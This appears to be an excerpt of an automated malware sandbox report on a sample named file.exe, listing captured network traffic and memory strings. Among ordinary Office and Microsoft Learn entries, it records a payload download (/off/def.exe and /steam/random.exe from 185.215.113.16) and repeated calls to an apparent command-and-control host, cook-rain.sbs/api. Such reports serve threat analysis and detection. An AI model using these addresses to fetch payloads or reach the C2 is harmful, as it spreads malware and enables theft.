              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4831Host: login.live.com
              Source: file.exe, 00000000.00000003.2472589117.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000002.2561803967.0000000000EFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeAppleWebKit/537.36
              Source: file.exe, 00000000.00000002.2561917561.0000000001036000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2472589117.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2209698310.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2292652191.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2335045999.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316039420.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2187103752.0000000001095000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2292290513.000000000108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_204.14.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_204.14.dr, chromecache_205.14.dr, chromecache_171.14.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_204.14.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_204.14.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_204.14.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.2265449881.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265562675.0000000005971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: file.exe, 00000000.00000003.2265449881.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265562675.0000000005971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.2265449881.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265562675.0000000005971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: file.exe, 00000000.00000003.2265449881.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265562675.0000000005971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2315857933.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2473025092.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2334321223.0000000005963000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316255813.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2292290513.00000000010A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
              Source: file.exe, 00000000.00000003.2321194871.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2335045999.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2472240288.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2473025092.00000000010B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/C
              Source: file.exe, 00000000.00000003.2321194871.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2335045999.00000000010B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/V
              Source: file.exe, 00000000.00000003.2288788601.000000000596A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2472589117.0000000001021000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2472589117.0000000001036000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2334321223.0000000005963000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2561917561.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
              Source: file.exe, 00000000.00000003.2315857933.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2334321223.0000000005963000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api8
              Source: file.exe, 00000000.00000003.2472589117.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiCJ
              Source: file.exe, 00000000.00000003.2292267592.00000000010BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiets/Jc
              Source: file.exe, 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2292290513.000000000104F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316039420.000000000104E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/apiMYTs9TuPk2hBT00xLEKwQAAAACPkwSk36IN4eV2I8M8fBfL2wa3R5ZlT6PUlnjO6F2xxMfQ
              Source: file.exe, 00000000.00000003.2335045999.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/apisbs:443/apiMYTs9TuPk2hBT00xLEKwQAAAACPkwSk36IN4eV2I8M8fBfL2wa3R5ZlT6PUl
              Source: file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
